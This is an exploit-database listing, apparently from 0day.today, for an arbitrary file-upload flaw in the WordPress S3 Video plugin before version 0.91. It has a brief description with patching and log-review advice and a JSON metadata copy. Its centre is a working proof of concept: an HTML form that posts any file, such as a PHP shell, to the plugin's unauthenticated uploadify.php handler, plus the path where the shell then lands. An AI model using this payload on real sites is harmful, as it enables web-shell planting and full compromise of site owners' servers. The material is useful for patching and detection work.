WordPress S3 Video Remote Shell Upload Vulnerability
2015-12-11T00:00:00
ID 1337DAY-ID-24707 Type zdt Reporter Manish Tanwar Modified 2015-12-11T00:00:00
Description
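The WordPress S3 Video plugin suffers from a remote shell upload vulnerability: its bundled upload handler, `includes/uploadify.php`, accepts a multipart file upload and, judging by the proof of concept below, does so without a login step or a file-type restriction, so an uploaded PHP file ends up executable on the site. Versions prior to 0.91 are affected. Sites running the plugin should update to 0.91 or later, review access logs for POST requests to `/wp-content/plugins/s3-video/includes/uploadify.php`, and check the web root and the plugin directory for unexpected `.php` files.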
##################################################################################################
#Exploit Title : Wordpress S3 Video Plugin file upload
#Author : Manish Kishan Tanwar AKA error1046
#Vendor Link : http://plugins.svn.wordpress.org/s3-video/tags/0.91/
# Affected Version: below version 0.91
#Date : 9/12/2015
#Love to : zero cool,Team indishell,Mannu,Viki,Hardeep Singh,Jagriti,Kishan Singh and ritu rathi
#Discovered At : Indishell Lab
##################################################################################################
////////////////////////
/// Overview:
////////////////////////
The S3 Video Plugin allows the embedding of video media stored on Amazon's S3 storage into a WordPress blog post or page.
////////////////
/// POC ////
///////////////
http://www.taget.com/wp-content/plugins/s3-video/includes/uploadify.php
<form method=post action="http://www.taget.com/wp-content/plugins/s3-video/includes/uploadify.php" enctype="multipart/form-data">
<input type=file name=Filedata> <input type=submit name=submit>
shell location:-
target.com/shell.php
# 0day.today [2018-04-09] #
{"id": "1337DAY-ID-24707", "lastseen": "2018-04-09T19:43:54", "viewCount": 7, "bulletinFamily": "exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "edition": 2, "enchantments": {"score": {"value": 0.4, "vector": "NONE", "modified": "2018-04-09T19:43:54", "rev": 2}, "dependencies": {"references": [{"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:24707", "SECURITYVULNS:VULN:11131"]}], "modified": "2018-04-09T19:43:54", "rev": 2}, "vulnersScore": 0.4}, "type": "zdt", "sourceHref": "https://0day.today/exploit/24707", "description": "WordPress S3 Video plugin suffers from a remote shell upload vulnerability. Versions prior to 0.91 are affected.", "title": "WordPress S3 Video Remote Shell Upload Vulnerability", "cvelist": [], "sourceData": "##################################################################################################\r\n#Exploit Title : Wordpress S3 Video Plugin file upload \r\n#Author : Manish Kishan Tanwar AKA error1046\r\n#Vendor Link : http://plugins.svn.wordpress.org/s3-video/tags/0.91/ \r\n# Affected Version: below version 0.91\r\n#Date : 9/12/2015\r\n#Love to : zero cool,Team indishell,Mannu,Viki,Hardeep Singh,Jagriti,Kishan Singh and ritu rathi\r\n#Discovered At : Indishell Lab\r\n##################################################################################################\r\n\r\n////////////////////////\r\n/// Overview:\r\n////////////////////////\r\nThe S3 Video Plugin allows the embedding of video media stored on Amazon's S3 storage into a WordPress blog post or page.\r\n \r\n////////////////\r\n/// POC ////\r\n///////////////\r\n\r\n\r\nhttp://www.taget.com/wp-content/plugins/s3-video/includes/uploadify.php\r\n\r\n<form method=post action=\"http://www.taget.com/wp-content/plugins/s3-video/includes/uploadify.php\" enctype=\"multipart/form-data\">\r\n<input type=file name=Filedata> <input type=submit name=submit>\r\n\r\nshell location:-\r\ntarget.com/shell.php\n\n# 0day.today [2018-04-09] #", "published": 
"2015-12-11T00:00:00", "references": [], "reporter": "Manish Tanwar", "modified": "2015-12-11T00:00:00", "href": "https://0day.today/exploit/description/24707", "immutableFields": []}